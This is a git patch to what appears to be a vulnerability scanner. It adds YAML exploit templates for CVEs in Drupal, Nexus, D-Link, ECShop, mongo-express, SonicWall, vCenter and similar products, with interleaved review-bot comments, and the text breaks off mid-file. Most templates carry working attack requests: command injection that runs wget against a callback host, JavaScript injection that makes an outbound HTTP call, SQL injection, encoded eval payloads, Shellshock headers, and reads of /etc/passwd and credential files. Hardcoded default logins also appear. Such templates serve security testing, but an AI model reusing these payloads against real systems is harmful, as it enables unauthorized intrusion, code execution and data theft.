From 41deddb132b2d86df6d149a8bee8f91d64b865a8 Mon Sep 17 00:00:00 2001 
From: shadow1ng
Date: Thu, 25 Feb 2021 19:53:58 +0800
Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9yaml=E8=A7=A3=E6=9E=90?=
 =?UTF-8?q?=E6=A8=A1=E5=9D=97,=E6=94=AF=E6=8C=81=E5=AF=86=E7=A0=81?=
 =?UTF-8?q?=E7=88=86=E7=A0=B4,=E5=A6=82tomcat=E5=BC=B1=E5=8F=A3=E4=BB=A4?=
 =?UTF-8?q?=E3=80=82yaml=E4=B8=AD=E6=96=B0=E5=A2=9Esets=E5=8F=82=E6=95=B0,?=
 =?UTF-8?q?=E7=B1=BB=E5=9E=8B=E4=B8=BA=E6=95=B0=E7=BB=84,=E7=94=A8?=
 =?UTF-8?q?=E4=BA=8E=E5=AD=98=E6=94=BE=E5=AF=86=E7=A0=81,=E5=85=B7?=
 =?UTF-8?q?=E4=BD=93=E7=9C=8Btomcat-manager-week.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 README.md | 2 +-
 WebScan/pocs/dlink-cve-2019-16920-rce.yml | 19 +++++++++
 WebScan/pocs/drupal-cve-2014-3704-sqli.yml | 14 +++++++
 WebScan/pocs/drupal-cve-2018-7600-rce.yml | 39 +++++++++++++++++++
 WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml | 13 +++++++
 WebScan/pocs/ecshop-rce.yml | 27 +++++++++++++
 WebScan/pocs/jenkins-cve-2018-1000600.yml | 13 +++++++
 WebScan/pocs/jumpserver-unauth-rce.yml | 33 ++++++++++++++++
 WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml | 12 ++++++
 WebScan/pocs/laravel-debug-info-leak.yml | 11 ++++++
 WebScan/pocs/laravel-improper-webdir.yml | 11 ++++++
 WebScan/pocs/mongo-express-cve-2019-10758.yml | 21 ++++++++++
 WebScan/pocs/nexus-cve-2019-7238.yml | 20 ++++++++++
 WebScan/pocs/nexus-cve-2020-10199.yml | 21 ++++++++++
 WebScan/pocs/nexus-cve-2020-10204.yml | 20 ++++++++++
 WebScan/pocs/nexus-default-password.yml | 22 +++++++++++
 .../pocs/phpmyadmin-setup-deserialization.yml | 13 +++++++
 .../pocs/seeyon-ajax-unauthorized-access.yml | 16 ++++++++
 .../pocs/seeyon-cnvd-2020-62422-readfile.yml | 11 ++++++
 WebScan/pocs/sonicwall-ssl-vpn-rce.yml | 16 ++++++++
 WebScan/pocs/springboot-env-unauth.yml | 15 +++++++
 .../vmware-vcenter-arbitrary-file-read.yml | 18 +++++++++
 ...center-unauthorized-rce-cve-2021-21972.yml | 16 ++++++++
 .../wordpress-cve-2019-19985-infoleak.yml | 11 ++++++
 .../wordpress-ext-adaptive-images-lfi.yml | 13 +++++++
 WebScan/pocs/wordpress-ext-mailpress-rce.yml | 23 +++++++++++
 WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml | 16 ++++++++
 WebScan/pocs/yonyou-grp-u8-sqli.yml | 15 +++++++
 28 files changed, 480 insertions(+), 1 deletion(-)
 create mode 100644 WebScan/pocs/dlink-cve-2019-16920-rce.yml
 create mode 100644 WebScan/pocs/drupal-cve-2014-3704-sqli.yml
 create mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce.yml
 create mode 100644 WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml
 create mode 100644 WebScan/pocs/ecshop-rce.yml
 create mode 100644 WebScan/pocs/jenkins-cve-2018-1000600.yml
 create mode 100644 WebScan/pocs/jumpserver-unauth-rce.yml
 create mode 100644 WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml
 create mode 100644 WebScan/pocs/laravel-debug-info-leak.yml
 create mode 100644 WebScan/pocs/laravel-improper-webdir.yml
 create mode 100644 WebScan/pocs/mongo-express-cve-2019-10758.yml
 create mode 100644 WebScan/pocs/nexus-cve-2019-7238.yml
 create mode 100644 WebScan/pocs/nexus-cve-2020-10199.yml
 create mode 100644 WebScan/pocs/nexus-cve-2020-10204.yml
 create mode 100644 WebScan/pocs/nexus-default-password.yml
 create mode 100644 WebScan/pocs/phpmyadmin-setup-deserialization.yml
 create mode 100644 WebScan/pocs/seeyon-ajax-unauthorized-access.yml
 create mode 100644 WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml
 create mode 100644 WebScan/pocs/sonicwall-ssl-vpn-rce.yml
 create mode 100644 WebScan/pocs/springboot-env-unauth.yml
 create mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml
 create mode 100644 WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
 create mode 100644 WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml
 create mode 100644 WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml
 create mode 100644 WebScan/pocs/wordpress-ext-mailpress-rce.yml
 create mode 100644 WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml
 create mode 100644 WebScan/pocs/yonyou-grp-u8-sqli.yml
diff --git a/README.md b/README.md
index 88cdadd..ed77cdf 100644
--- a/README.md
+++ b/README.md @@ -14,7 +14,7 @@ 因为用习惯了f-scrack,习惯一条命令跑完所有模块,省去一个个模块单独调用的时间,当然我附加了-m 指定模块的功能。 ## 最近更新 -[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml +[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml [+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。 [+] 2021/2/5 修改icmp发包模式,更适合大规模探测。 修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度 diff --git a/WebScan/pocs/dlink-cve-2019-16920-rce.yml b/WebScan/pocs/dlink-cve-2019-16920-rce.yml new file mode 100644 index 0000000..8df53e7 --- /dev/null +++ b/WebScan/pocs/dlink-cve-2019-16920-rce.yml @@ -0,0 +1,19 @@ +name: poc-yaml-dlink-cve-2019-16920-rce +set: + reverse: newReverse() + reverseURL: reverse.url +rules: + - method: POST + path: /apply_sec.cgi + headers: + Content-Type: application/x-www-form-urlencoded + body: >- + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} + follow_redirects: true + expression: | + response.status == 200 && reverse.wait(5) +detail: + author: JingLing(https://hackfun.org/) + links: + - https://www.anquanke.com/post/id/187923 + - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml new file mode 100644 index 0000000..87d6939 --- /dev/null +++ b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml 
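Review bot: The dlink rule executes a command on the target (the `wget` of the reverse URL injected through `ping_ipaddr`) and only reports a hit after `reverse.wait(5)`, but nothing in `detail` tells an operator that the check is intrusive or that it needs a reachable reverse listener; without one every scanned host is reported clean. Add an `info:` entry to `detail`, e.g. `info: intrusive check - runs wget on the target and requires a reachable reverse listener (reverse.wait(5))`. The same documentation gap exists in jenkins-cve-2018-1000600 (callback via `apiUrl`, no listener means no finding) and mongo-express-cve-2019-10758. Minor style point: this file names the variable `reverseURL` while the jenkins file uses `reverseUrl`; pick one spelling across the poc set.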
@@ -0,0 +1,14 @@ +name: poc-yaml-drupal-cve-2014-3704-sqli +rules: + - method: POST + path: /?q=node&destination=node + body: >- + pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or + updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a + follow_redirects: false + expression: | + response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") +detail: + Affected Version: "Drupal < 7.32" + links: + - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml new file mode 100644 index 0000000..5697049 --- /dev/null +++ b/WebScan/pocs/drupal-cve-2018-7600-rce.yml 
@@ -0,0 +1,39 @@ +name: poc-yaml-drupal-cve-2018-7600-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +groups: + drupal8: + - method: POST + path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) + drupal7: + - method: POST + path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password + search: | + name="form_build_id"\s+value="(?P.+?)" + expression: | + response.status == 200 + - method: POST + path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_build_id={{build_id}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) +detail: + links: + - https://github.com/dreadlocked/Drupalgeddon2 + - https://paper.seebug.org/567/ +test: + target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml new file mode 100644 index 0000000..0b7721c --- /dev/null +++ b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml @@ -0,0 +1,13 @@ +name: poc-yaml-ecshop-cnvd-2020-58823-sqli +set: + r1: randomInt(40000, 44800) +rules: + - method: POST + path: /delete_cart_goods.php + body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) + expression: | + response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw \ No newline at end of file 
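Review bot: In the `drupal7` group the `search` pattern reads `name="form_build_id"\s+value="(?P.+?)"` as rendered, i.e. a `(?P` group with no name, yet the following rule interpolates `{{build_id}}`; with no named capture the variable is never bound, the second request cannot be built and the group silently never fires. This looks like an extraction artifact (an angle-bracketed name inside `(?P<…>)` is exactly what an HTML renderer drops), so verify that the committed file does name the capture `build_id` before treating it as a bug. Consider also adding `Affected Version` to `detail` as the sibling drupal-cve-2014-3704 file does, since this template covers two Drupal major versions via its groups.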
diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml new file mode 100644 index 0000000..acaa0a0 --- /dev/null +++ b/WebScan/pocs/ecshop-rce.yml @@ -0,0 +1,27 @@ +name: poc-yaml-ecshop-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +groups: + 2.x: + - method: POST + path: /user.php + headers: + Referer: >- + 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) + 3.x: + - method: POST + path: /user.php + headers: + Referer: >- + 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000600.yml b/WebScan/pocs/jenkins-cve-2018-1000600.yml new file mode 100644 index 0000000..663f427 --- /dev/null +++ b/WebScan/pocs/jenkins-cve-2018-1000600.yml 
@@ -0,0 +1,13 @@ +name: poc-yaml-jenkins-cve-2018-1000600 +set: + reverse: newReverse() + reverseUrl: reverse.url +rules: + - method: GET + path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} + expression: | + response.status == 200 && reverse.wait(5) +detail: + author: PickledFish(https://github.com/PickledFish) + links: + - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml new file mode 100644 index 0000000..36d9752 --- /dev/null +++ b/WebScan/pocs/jumpserver-unauth-rce.yml 
@@ -0,0 +1,33 @@ +name: poc-yaml-jumpserver-unauth-rce +set: + r1: randomLowercase(5) +groups: + users: + - method: GET + path: /api/v1/users/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/users/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") + authentication: + - method: GET + path: /api/v1/authentication/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/authentication/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +detail: + author: mvhz81 + info: jumpserver unauth read logfile + jumpserver rce + links: + - https://s.tencent.com/research/bsafe/1228.html + - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw + - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml new file mode 100644 index 0000000..b4c8a72 --- /dev/null +++ b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml 
@@ -0,0 +1,12 @@ +name: poc-yaml-lanproxy-cve-2021-3019-lfi +rules: + - method: GET + path: "/../conf/config.properties" + expression: | + response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") +detail: + author: pa55w0rd(www.pa55w0rd.online/) + Affected Version: "lanproxy 0.1" + links: + - https://github.com/ffay/lanproxy/issues/152 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml new file mode 100644 index 0000000..aa5610e --- /dev/null +++ b/WebScan/pocs/laravel-debug-info-leak.yml @@ -0,0 +1,11 @@ +name: poc-yaml-laravel-debug-info-leak +rules: + - method: POST + path: / + follow_redirects: false + expression: > + response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) +detail: + author: Dem0ns (https://github.com/dem0ns) + links: + - https://github.com/dem0ns/improper/tree/master/laravel/5_debug diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml new file mode 100644 index 0000000..d1db0b5 --- /dev/null +++ b/WebScan/pocs/laravel-improper-webdir.yml 
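Review bot: The lanproxy expression wraps each literal as `bytes(string(b"config.admin.username"))`, a bytes-to-string-to-bytes round trip that adds nothing; every other template in this commit writes the literal directly, e.g. `response.body.bcontains(b"config.admin.username")`. The same applies to the `config.admin.password` literal on the same line. Keeping one form across the poc set makes the expressions easier to review.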
@@ -0,0 +1,11 @@ +name: poc-yaml-laravel-improper-webdir +rules: + - method: GET + path: /storage/logs/laravel.log + follow_redirects: false + expression: > + response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) +detail: + author: Dem0ns (https://github.com/dem0ns) + links: + - https://github.com/dem0ns/improper diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml new file mode 100644 index 0000000..6d64293 --- /dev/null +++ b/WebScan/pocs/mongo-express-cve-2019-10758.yml @@ -0,0 +1,21 @@ +name: poc-yaml-mongo-express-cve-2019-10758 +set: + reverse: newReverse() + reverseURL: reverse.url +rules: + - method: POST + path: /checkValid + headers: + Authorization: Basic YWRtaW46cGFzcw== + body: >- + document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') + follow_redirects: true + expression: > + reverse.wait(5) +detail: + vulnpath: '/checkValid' + author: fnmsd(https://github.com/fnmsd) + description: 'Mongo Express CVE-2019-10758 Code Execution' + links: + - https://github.com/masahiro331/CVE-2019-10758 + - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html \ No newline at end of file diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml new file mode 100644 index 0000000..69d5bc4 --- /dev/null +++ b/WebScan/pocs/nexus-cve-2019-7238.yml 
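Review bot: The mongo-express rule sends a fixed `Authorization: Basic …` header, so the check can only succeed on an instance that still uses the default credentials that header encodes, and a host that changed them but still runs a vulnerable version is reported clean; `description` should say so rather than only `Code Execution`. Something like `description: 'Mongo Express CVE-2019-10758 code execution; intrusive (runs JS on the target), assumes default basic-auth credentials and a reachable reverse listener'`. The `follow_redirects: true` setting appears to have no bearing on a check decided solely by `reverse.wait(5)`; if that is the case it could be dropped for clarity.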
@@ -0,0 +1,20 @@ +name: poc-yaml-nexus-cve-2019-7238 +set: + r1: randomInt(800000000, 1000000000) + r2: randomInt(800000000, 1000000000) +rules: + - method: POST + path: "/service/extdirect" + headers: + Content-Type: application/json + body: | + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) +detail: + Affected Version: "nexus<3.15" + author: hanxiansheng26(https://github.com/hanxiansheng26) + links: + - https://github.com/jas502n/CVE-2019-7238 + - https://github.com/verctor/nexus_rce_CVE-2019-7238 + - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238 diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml new file mode 100644 index 0000000..7ce9fa7 --- /dev/null +++ b/WebScan/pocs/nexus-cve-2020-10199.yml 
@@ -0,0 +1,21 @@ +name: poc-yaml-nexus-cve-2020-10199 +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: "/rest/beta/repositories/go/group" + headers: + Content-Type: application/json + body: | + {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} + expression: | + response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + Affected Version: "nexus<3.21.2" + author: kingkk(https://www.kingkk.com/) + links: + - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb + - https://www.cnblogs.com/magic-zero/p/12641068.html + - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype + - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml new file mode 100644 index 0000000..a08a2bb --- /dev/null +++ b/WebScan/pocs/nexus-cve-2020-10204.yml 
@@ -0,0 +1,20 @@ +name: poc-yaml-nexus-cve-2020-10204 +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: "/extdirect" + headers: + Content-Type: application/json + body: | + {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + Affected Version: "nexus<3.21.2" + author: kingkk(https://www.kingkk.com/) + links: + - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb + - https://www.cnblogs.com/magic-zero/p/12641068.html + - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml new file mode 100644 index 0000000..5a27c24 --- /dev/null +++ b/WebScan/pocs/nexus-default-password.yml @@ -0,0 +1,22 @@ +name: poc-yaml-nexus-default-password +rules: + - method: GET + path: /nexus/service/siesta/capabilities + expression: > + response.status == 401 + - method: GET + path: /nexus/service/local/authentication/login + headers: + Accept: application/json + Authorization: Basic YWRtaW46YWRtaW4xMjM= + expression: > + response.status == 200 + - method: GET + path: /nexus/service/siesta/capabilities + expression: > + response.status == 200 +detail: + author: Soveless(https://github.com/Soveless) + Affected Version: "Nexus Repository Manager OSS" + links: + - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager \ No newline at end of file 
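Review bot: The third rule in nexus-default-password requests `/nexus/service/siesta/capabilities` again with no `Authorization` header and expects `200` where the first rule expected `401`, so the result depends on the engine carrying the session cookie set by the login response across rules; that assumption is not written down anywhere in the template. Add a `detail.info` line, e.g. `info: relies on the scanner persisting cookies between rules; the final capabilities request is authenticated only by the session from rule 2`. If the engine does not persist cookies the rule can never match and the default-credential finding is lost. Also `Affected Version: "Nexus Repository Manager OSS"` names a product rather than a version range.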
diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml new file mode 100644 index 0000000..7bf691e --- /dev/null +++ b/WebScan/pocs/phpmyadmin-setup-deserialization.yml @@ -0,0 +1,13 @@ +name: poc-yaml-phpmyadmin-setup-deserialization +rules: + - method: POST + path: /scripts/setup.php + body: >- + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + follow_redirects: false + expression: >- + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: p0wd3r + links: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml new file mode 100644 index 0000000..92ce028 --- /dev/null +++ b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml @@ -0,0 +1,16 @@ +name: poc-yaml-seeyon-ajax-unauthorized-access +rules: + - method: GET + path: /seeyon/thirdpartyController.do.css/..;/ajax.do + expression: | + response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) + - method: GET + path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile + expression: | + response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") + +detail: + author: x1n9Qi8 + links: + - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA + - https://buaq.net/go-53721.html diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml new file mode 100644 index 0000000..f6373ff --- /dev/null +++ b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml 
@@ -0,0 +1,11 @@ +name: poc-yaml-seeyon-cnvd-2020-62422-readfile +rules: + - method: GET + path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties + follow_redirects: false + expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") +detail: + author: Aquilao(https://github.com/Aquilao) + info: seeyon readfile(CNVD-2020-62422) + links: + - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml new file mode 100644 index 0000000..4b00104 --- /dev/null +++ b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml @@ -0,0 +1,16 @@ +name: poc-yaml-sonicwall-ssl-vpn-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(1140000, 1144800) +rules: + - method: GET + path: /cgi-bin/jarrewrite.sh + follow_redirects: false + headers: + X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) +detail: + author: sharecast + links: + - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml new file mode 100644 index 0000000..582ee48 --- /dev/null +++ b/WebScan/pocs/springboot-env-unauth.yml @@ -0,0 +1,15 @@ +name: poc-yaml-springboot-env-unauth +groups: + spring1: + - method: GET + path: /env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") + spring2: + - method: GET + path: /actuator/env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +detail: + links: + - https://github.com/LandGrey/SpringBootVulExploit 
diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml new file mode 100644 index 0000000..d831b24 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml @@ -0,0 +1,18 @@ +name: poc-yaml-vmware-vcenter-arbitrary-file-read +groups: + win: + - method: GET + path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") + linux: + - method: GET + path: /eam/vib?id=/etc/passwd + follow_redirects: false + expression: | + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml new file mode 100644 index 0000000..c2ed9a9 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml @@ -0,0 +1,16 @@ +name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 +rules: + - method: GET + path: /ui/vropspluginui/rest/services/uploadova + follow_redirects: false + expression: | + response.status == 405 && response.body.bcontains(b"Method Not Allowed") + - method: GET + path: /ui/vropspluginui/rest/services/getstatus + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") +detail: + author: B1anda0(https://github.com/B1anda0) + links: + - https://swarm.ptsecurity.com/unauth-rce-vmware/ \ No newline at end of file diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml new file mode 100644 index 0000000..5d75468 --- /dev/null +++ b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml 
